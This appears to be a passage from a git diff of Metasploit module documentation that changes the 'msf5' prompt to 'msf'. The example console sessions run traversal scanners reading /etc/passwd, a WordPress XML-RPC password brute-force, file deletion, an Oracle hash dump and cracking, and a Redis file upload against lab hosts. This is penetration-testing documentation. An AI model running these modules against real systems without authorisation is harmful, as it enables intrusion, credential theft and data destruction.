RPORT => 8320 -msf5 auxiliary(scanner/http/totaljs_traversal) > run +msf auxiliary(scanner/http/totaljs_traversal) > run [*] Running module against 192.168.2.59 [*] Total.js version is: ^3.2.0 @@ -60,5 +60,5 @@ msf5 auxiliary(scanner/http/totaljs_traversal) > run [*] App description: A simple and powerful CMS solution written in Total.js / Node.js. [*] App version: 12.0.0 [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/totaljs_traversal) > +msf auxiliary(scanner/http/totaljs_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md b/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md index dc3b930f63..09609de9a2 100644 --- a/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md @@ -18,14 +18,14 @@ This module exploits an unauthenticated directory traversal vulnerability which ### Tested against Windows 7 SP1 ``` -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152 +msf auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152 RHOSTS => 192.168.43.152 -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run +msf auxiliary(scanner/http/tvt_nvms_traversal) > run [+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > +msf auxiliary(scanner/http/tvt_nvms_traversal) > ``` ## References diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md b/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md index 7c542147c4..09a2134cdf 100644 --- a/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md @@ -120,18 +120,18 @@ How often to print a prorgress bar while scanning for themes/plugins. Defaults Follow the Instructions above to setup the Docksal Containers. ``` -msf5 > use auxiliary/scanner/http/wordpress_scanner -msf5 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_scanner +msf auxiliary(scanner/http/wordpress_scanner) > set RHOSTS msf-wp.docksal RHOSTS => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal +msf auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_scanner) > run +msf auxiliary(scanner/http/wordpress_scanner) > run [*] Trying 192.168.64.100 [+] 192.168.64.100 running Wordpress 5.2 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_scanner) > +msf auxiliary(scanner/http/wordpress_scanner) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md b/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md index 8c4698af97..7ab195f596 100644 --- a/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md +++ b/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md @@ -116,16 +116,16 @@ Try the username as the password for all users (default: `false`) Follow the Instructions above to setup the Docksal Containers. ``` -msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_xmlrpc_login +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin USERNAME => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin PASSWORD => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > run [*] 192.168.64.100:80 :/xmlrpc.php - Sending Hello... [+] 192.168.64.100:80 - XMLRPC enabled, Hello message received! @@ -133,7 +133,7 @@ msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run [+] 192.168.64.100:80 - Success: 'admin:admin' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > ``` @@ -144,19 +144,19 @@ You may see this message also, if you forgot to set the `VHOST` option. ``` -msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_xmlrpc_login +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin USERNAME => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin PASSWORD => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > run [*] 192.168.64.100:80 :/xmlrpc.php - Sending Hello... [-] XMLRPC is not enabled! Aborting [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md b/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md index d8b038eb51..5471767553 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md +++ b/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md @@ -18,18 +18,18 @@ WordPress <= 4.9.6 ## Scenarios ``` -msf5 > use auxiliary/scanner/http/wp_arbitrary_file_deletion -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set VERBOSE true +msf > use auxiliary/scanner/http/wp_arbitrary_file_deletion +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set VERBOSE true VERBOSE => true -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RPORT 8000 +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RPORT 8000 RPORT => 8000 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RHOSTS 127.0.0.1 +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set PASSWORD xxx +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set PASSWORD xxx PASSWORD => password1 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set USERNAME xxx +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set USERNAME xxx USERNAME => techbrunch -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > run +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > run [*] Checking if target is online and running Wordpress... [*] Checking access... @@ -39,4 +39,4 @@ msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > run [*] Deleting media... [+] File deleted! [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md b/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md index 3152806bd0..edfbb4f23c 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md +++ b/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md @@ -120,12 +120,12 @@ Traversal Depth (to reach the root folder) (default: `7`) Follow the Instructions above to setup the Docksal Containers. ```` -msf5 > use auxiliary/scanner/http/wp_dukapress_file_read -msf5 > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wp_dukapress_file_read +msf > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 > set VHOST msf-wp.docksal +msf > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 > run +msf > run [*] Downloading file... diff --git a/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md b/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md index d20c68b190..8b4c5eb658 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md +++ b/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md @@ -24,17 +24,17 @@ Vulnerable version: [duplicator.1.3.24.zip](https://downloads.wordpress.org/plug ### Ubuntu 20.04 running WordPress 5.6, Duplicator 1.3.26 ``` -msf5 > use auxiliary/scanner/http/wp_duplicator_file_read -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/wp_duplicator_file_read +msf auxiliary(scanner/http/wp_duplicator_file_read) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set rport 8080 +msf auxiliary(scanner/http/wp_duplicator_file_read) > set rport 8080 rport => 8080 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set FILEPATH /etc/passwd +msf auxiliary(scanner/http/wp_duplicator_file_read) > set FILEPATH /etc/passwd FILEPATH => /etc/passwd -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set DEPTH 5 +msf auxiliary(scanner/http/wp_duplicator_file_read) > set DEPTH 5 DEPTH => 5 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > run +msf auxiliary(scanner/http/wp_duplicator_file_read) > run [*] Downloading file... diff --git a/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md b/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md index 5a1bb756d8..e460595d88 100644 --- a/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md @@ -20,15 +20,15 @@ Zen load balancer before v3.10.1 is vulnerable to authenticated directory traver ## Scenarios ``` -msf5 > use auxiliary/scanner/http/zenload_balancer_traversal -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101 +msf > use auxiliary/scanner/http/zenload_balancer_traversal +msf auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true +msf auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true SSL => true -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run +msf auxiliary(scanner/http/zenload_balancer_traversal) > run [*] Running module against 192.168.1.101 [+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > +msf auxiliary(scanner/http/zenload_balancer_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/imap/imap_version.md b/documentation/modules/auxiliary/scanner/imap/imap_version.md index e8848616f2..cb6b960275 100644 --- a/documentation/modules/auxiliary/scanner/imap/imap_version.md +++ b/documentation/modules/auxiliary/scanner/imap/imap_version.md @@ -34,10 +34,10 @@ in a production environment. ### Dovecot 2.3.2 (582970113) on Kali ``` - msf5 > use auxiliary/scanner/imap/imap_version - msf5 auxiliary(scanner/imap/imap_version) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/imap/imap_version + msf auxiliary(scanner/imap/imap_version) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/imap/imap_version) > run + msf auxiliary(scanner/imap/imap_version) > run [+] 10.168.202.216:143 - 10.168.202.216:143 IMAP * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Debian) ready.\x0d\x0a [*] 10.168.202.216:143 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md b/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md index 7d5aef07d9..67268e3abc 100644 --- a/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md +++ b/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md @@ -54,10 +54,10 @@ docker run -ti --rm -p 11211:11211/udp memcached:1.5.5 Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: No packet amplification and a 78x, 1163-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) @@ -69,10 +69,10 @@ msf5 auxiliary(scanner/memcached/memcached_amp) > run Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: No packet amplification and a 68x, 1015-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) @@ -84,10 +84,10 @@ msf5 auxiliary(scanner/memcached/memcached_amp) > run Configure memcached in docker as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: 2x packet amplification and a 126x, 1880-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md b/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md index a7cbe63208..eba820441c 100644 --- a/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md +++ b/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md @@ -39,10 +39,10 @@ docker run -ti --rm -p 11211:11211/udp memcached:1.5.5 Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_udp_version -msf5 auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_udp_version +msf auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_udp_version) > run +msf auxiliary(scanner/memcached/memcached_udp_version) > run [+] a.b.c.d:11211/udp memcached version 1.4.15 [*] Scanned 1 of 1 hosts (100% complete) @@ -54,10 +54,10 @@ msf5 auxiliary(scanner/memcached/memcached_udp_version) > run Configure memcached in docker as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_udp_version -msf5 auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_udp_version +msf auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_udp_version) > run +msf auxiliary(scanner/memcached/memcached_udp_version) > run [+] a.b.c.d:11211/udp memcached version 1.5.5 [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md b/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md index 1fcc90c56a..6b43885854 100644 --- a/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md +++ b/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md @@ -35,9 +35,9 @@ docker restart `docker ps -q` Against the above-described Docker container, the workflow looks like: ``` -msf5 auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1 -msf5 auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099 -msf5 auxiliary(scanner/misc/java_jmx_server) > run +msf auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1 +msf auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099 +msf auxiliary(scanner/misc/java_jmx_server) > run [*] Reloading module... [*] 127.0.0.1:1099 - Sending RMI header... @@ -49,7 +49,7 @@ msf5 auxiliary(scanner/misc/java_jmx_server) > run In addition, note that `services` within the data model has been updated: ``` -msf5 auxiliary(scanner/misc/java_jmx_server) > services +msf auxiliary(scanner/misc/java_jmx_server) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/msmail/host_id.md b/documentation/modules/auxiliary/scanner/msmail/host_id.md index f82f54f749..e80178ef5b 100644 --- a/documentation/modules/auxiliary/scanner/msmail/host_id.md +++ b/documentation/modules/auxiliary/scanner/msmail/host_id.md @@ -21,10 +21,10 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks. *Results should look like below:* ``` -msf5 > use auxiliary/scanner/msmail/host_id -msf5 auxiliary(scanner/msmail/host_id) > set RHOSTS +msf > use auxiliary/scanner/msmail/host_id +msf auxiliary(scanner/msmail/host_id) > set RHOSTS RHOSTS => -msf5 auxiliary(scanner/msmail/host_id) > run +msf auxiliary(scanner/msmail/host_id) > run [*] Running for ... [*] Attempting to harvest internal domain: @@ -39,4 +39,4 @@ msf5 auxiliary(scanner/msmail/host_id) > run [*] [+] https:///oab [*] [+] https:///ews -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md b/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md index 41cce12d90..30f23bb3d5 100644 --- a/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md +++ b/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md @@ -53,10 +53,10 @@ ## Scenarios -### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine) +### Running Oracle 12c on a local Windows 10 machine, and msf on Ubuntu for Windows (same machine) ``` -msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options +msf auxiliary(scanner/oracle/oracle_hashdump) > show options Module options (auxiliary/scanner/oracle/oracle_hashdump): Name Current Setting Required Description @@ -69,7 +69,7 @@ Module options (auxiliary/scanner/oracle/oracle_hashdump): SID staticdb yes The sid to authenticate with. THREADS 1 yes The number of concurrent threads -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [*] Server is running 12c [*] Hash table : @@ -85,7 +85,7 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run [+] Hash Table has been saved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds +msf auxiliary(scanner/oracle/oracle_hashdump) > creds Credentials =========== @@ -98,8 +98,8 @@ host origin service public private These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)). ``` -msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast -msf5 auxiliary(analyze/jtr_oracle_fast) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast +msf auxiliary(analyze/jtr_oracle_fast) > run ... [*] Cracking oracle12c hashes in normal wordlist mode... Using default input encoding: UTF-8 @@ -139,9 +139,9 @@ resource (oracle.rb)> set dbpass oracle dbpass => oracle resource (oracle.rb)> set sid XE sid => XE -msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true +msf auxiliary(scanner/oracle/oracle_hashdump) > set verbose true verbose => true -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [*] Server is running version 11g [*] Hash table : diff --git a/documentation/modules/auxiliary/scanner/pop3/pop3_version.md b/documentation/modules/auxiliary/scanner/pop3/pop3_version.md index 1283ff5e9c..5470f4fb11 100644 --- a/documentation/modules/auxiliary/scanner/pop3/pop3_version.md +++ b/documentation/modules/auxiliary/scanner/pop3/pop3_version.md @@ -24,9 +24,9 @@ in a production environment. ### Dovecot 2.3.2 (582970113) on Kali ``` - msf5 auxiliary(scanner/pop3/pop3_version) > use auxiliary/scanner/pop3/pop3_version - msf5 auxiliary(scanner/pop3/pop3_version) > set rhosts 10.168.202.216 - msf5 auxiliary(scanner/pop3/pop3_version) > run + msf auxiliary(scanner/pop3/pop3_version) > use auxiliary/scanner/pop3/pop3_version + msf auxiliary(scanner/pop3/pop3_version) > set rhosts 10.168.202.216 + msf auxiliary(scanner/pop3/pop3_version) > run [+] 10.168.202.216:110 - 10.168.202.216:110 POP3 +OK Dovecot (Debian) ready.\x0d\x0a [*] 10.168.202.216:110 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/redis/file_upload.md b/documentation/modules/auxiliary/scanner/redis/file_upload.md index 1107eee9ad..628c533c7b 100644 --- a/documentation/modules/auxiliary/scanner/redis/file_upload.md +++ b/documentation/modules/auxiliary/scanner/redis/file_upload.md @@ -42,13 +42,13 @@ Path, or file name, to store the file as on the Redis server. ### Redis: 4.0.14 inside a docker container ``` -msf5 auxiliary(scanner/redis/file_upload) > set RHOSTS 172.17.0.2 +msf auxiliary(scanner/redis/file_upload) > set RHOSTS 172.17.0.2 RHOSTS => 172.17.0.2 -msf5 auxiliary(scanner/redis/file_upload) > set LocalFile redis_upload_test.txt +msf auxiliary(scanner/redis/file_upload) > set LocalFile redis_upload_test.txt LocalFile => redis_upload_test.txt -msf5 auxiliary(scanner/redis/file_upload) > set RemoteFile redis_upload_test.txt +msf auxiliary(scanner/redis/file_upload) > set RemoteFile redis_upload_test.txt RemoteFile => redis_upload_test.txt -msf5 auxiliary(scanner/redis/file_upload) > run +msf auxiliary(scanner/redis/file_upload) > run [+] 172.17.0.2:6379 - 172.17.0.2:6379 -- saved 23 bytes inside of redis DB at redis_upload_test.txt [*] 172.17.0.2:6379 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/redis/redis_server.md b/documentation/modules/auxiliary/scanner/redis/redis_server.md index 49137c87bf..d1548fd6f0 100644 --- a/documentation/modules/auxiliary/scanner/redis/redis_server.md +++ b/documentation/modules/auxiliary/scanner/redis/redis_server.md @@ -30,10 +30,10 @@ Redis commands list can be found [here](https://redis.io/commands). ### Redis: 4.0.14 inside a docker container ``` -msf5 auxiliary(scanner/redis/redis_server) > use auxiliary/scanner/redis/redis_server -msf5 auxiliary(scanner/redis/redis_server) > set RHOSTS 172.17.0.3 +msf auxiliary(scanner/redis/redis_server) > use auxiliary/scanner/redis/redis_server +msf auxiliary(scanner/redis/redis_server) > set RHOSTS 172.17.0.3 RHOSTS => 172.17.0.3 -msf5 auxiliary(scanner/redis/redis_server) > run +msf auxiliary(scanner/redis/redis_server) > run [+] 172.17.0.3:6379 - Found redis with INFO command: $2701\x0d\x0a# Server\x0d\x0aredis_version:4.0.14\x0d\x0aredis_git_sha1:00000000\x0d\x0aredis_git_dirty:0\x0d\x0aredis_build_id:30850c2ae048947f\x0d\x0aredis_mode:standalone\x0d\x0aos:Linux 4.19.69-1-MANJARO x86_64\x0d\x0aarch_bits:64\x0d\x0amultiplexing_api:epoll\x0d\x0aatomicvar_api:atomic-builtin\x0d\x0agcc_version:8.3.0\x0d\x0aprocess_id:1\x0d\x0arun_id:de1d3d4547ce93ecad76de2efdbcf7ae2d456613\x0d\x0atcp_port:6379\x0d\x0auptime_in_seconds:564\x0d\x0auptime_in_days:0\x0d\x0ahz:10\x0d\x0alru_clock:10154159\x0d\x0aexecutable:/data/redis-server\x0d\x0aconfig_file:\x0d\x0a\x0d\x0a# Clients\x0d\x0aconnected_clients:1\x0d\x0aclient_longest_output_list:0\x0d\x0aclient_biggest_input_buf:0\x0d\x0ablocked_clients:0\x0d\x0a\x0d\x0a# Memory\x0d\x0aused_memory:849224\x0d\x0aused_memory_human:829.32K\x0d\x0aused_memory_rss:4464640\x0d\x0aused_memory_rss_human:4.26M\x0d\x0aused_memory_peak:849224\x0d\x0aused_memory_peak_human:829.32K\x0d\x0aused_memory_peak_perc:100.00%\x0d\x0aused_memory_overhead:836126\x0d\x0aused_memory_startup:786488\x0d\x0aused_memory_dataset:13098\x0d\x0aused_memory_dataset_perc:20.88%\x0d\x0atotal_system_memory:12010311680\x0d\x0atotal_system_memory_human:11.19G\x0d\x0aused_memory_lua:37888\x0d\x0aused_memory_lua_human:37.00K\x0d\x0amaxmemory:0\x0d\x0amaxmemory_human:0B\x0d\x0amaxmemory_policy:noeviction\x0d\x0amem_fragmentation_ratio:5.26\x0d\x0amem_allocator:jemalloc-4.0.3\x0d\x0aactive_defrag_running:0\x0d\x0alazyfree_pending_objects:0\x0d\x0a\x0d\x0a# Persistence\x0d\x0aloading:0\x0d\x0ardb_changes_since_last_save:0\x0d\x0ardb_bgsave_in_progress:0\x0d\x0ardb_last_save_time:1570434683\x0d\x0ardb_last_bgsave_status:ok\x0d\x0ardb_last_bgsave_time_sec:-1\x0d\x0ardb_current_bgsave_time_sec:-1\x0d\x0ardb_last_cow_size:0\x0d\x0aaof_enabled:0\x0d\x0aaof_rewrite_in_progress:0\x0d\x0aaof_rewrite_scheduled:0\x0d\x0aaof_last_rewrite_time_sec:-1\x0d\x0aaof_current_rewrite_time_sec:-1\x0d\x0aaof_last_bgrewrite_status:ok\x0d\x0aaof_last_write_status:ok\x0d\x0aaof_last_cow_size:0\x0d\x0a\x0d\x0a# Stats\x0d\x0atotal_connections_received:5\x0d\x0atotal_commands_processed:3\x0d\x0ainstantaneous_ops_per_sec:0\x0d\x0atotal_net_input_bytes:79\x0d\x0atotal_net_output_bytes:8191\x0d\x0ainstantaneous_input_kbps:0.00\x0d\x0ainstantaneous_output_kbps:0.00\x0d\x0arejected_connections:0\x0d\x0async_full:0\x0d\x0async_partial_ok:0\x0d\x0async_partial_err:0\x0d\x0aexpired_keys:0\x0d\x0aexpired_stale_perc:0.00\x0d\x0aexpired_time_cap_reached_count:0\x0d\x0aevicted_keys:0\x0d\x0akeyspace_hits:0\x0d\x0akeyspace_misses:0\x0d\x0apubsub_channels:0\x0d\x0apubsub_patterns:0\x0d\x0alatest_fork_usec:0\x0d\x0amigrate_cached_sockets:0\x0d\x0aslave_expires_tracked_keys:0\x0d\x0aactive_defrag_hits:0\x0d\x0aactive_defrag_misses:0\x0d\x0aactive_defrag_key_hits:0\x0d\x0aactive_defrag_key_misses:0\x0d\x0a\x0d\x0a# Replication\x0d\x0arole:master\x0d\x0aconnected_slaves:0\x0d\x0amaster_replid:0d4b69672220406a209cf68d63e22215f5bc8741\x0d\x0amaster_replid2:0000000000000000000000000000000000000000\x0d\x0amaster_repl_offset:0\x0d\x0asecond_repl_offset:-1\x0d\x0arepl_backlog_active:0\x0d\x0arepl_backlog_size:1048576\x0d\x0arepl_backlog_first_byte_offset:0\x0d\x0arepl_backlog_histlen:0\x0d\x0a\x0d\x0a# CPU\x0d\x0aused_cpu_sys:0.66\x0d\x0aused_cpu_user:0.45\x0d\x0aused_cpu_sys_children:0.00\x0d\x0aused_cpu_user_children:0.00\x0d\x0a\x0d\x0a# Cluster\x0d\x0acluster_enabled:0\x0d\x0a\x0d\x0a# Keyspace [*] 172.17.0.3:6379 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/rsync/modules_list.md b/documentation/modules/auxiliary/scanner/rsync/modules_list.md index 6ab23df945..2d2d322251 100644 --- a/documentation/modules/auxiliary/scanner/rsync/modules_list.md +++ b/documentation/modules/auxiliary/scanner/rsync/modules_list.md @@ -67,10 +67,10 @@ rsync3:VU&A1We5DEa8M6^8" > /etc/rsyncd.secrets``` With verbose set to `false`: ``` - msf5 > use auxiliary/scanner/rsync/modules_list - msf5 auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/rsync/modules_list + msf auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/rsync/modules_list) > run + msf auxiliary(scanner/rsync/modules_list) > run [+] 10.168.202.216:873 - 3 rsync modules found: read only files, writable, authenticated ``` @@ -78,12 +78,12 @@ With verbose set to `false`: With verbose set to `true`: ``` - msf5 > use auxiliary/scanner/rsync/modules_list - msf5 auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/rsync/modules_list + msf auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/rsync/modules_list) > set verbose true + msf auxiliary(scanner/rsync/modules_list) > set verbose true verbose => 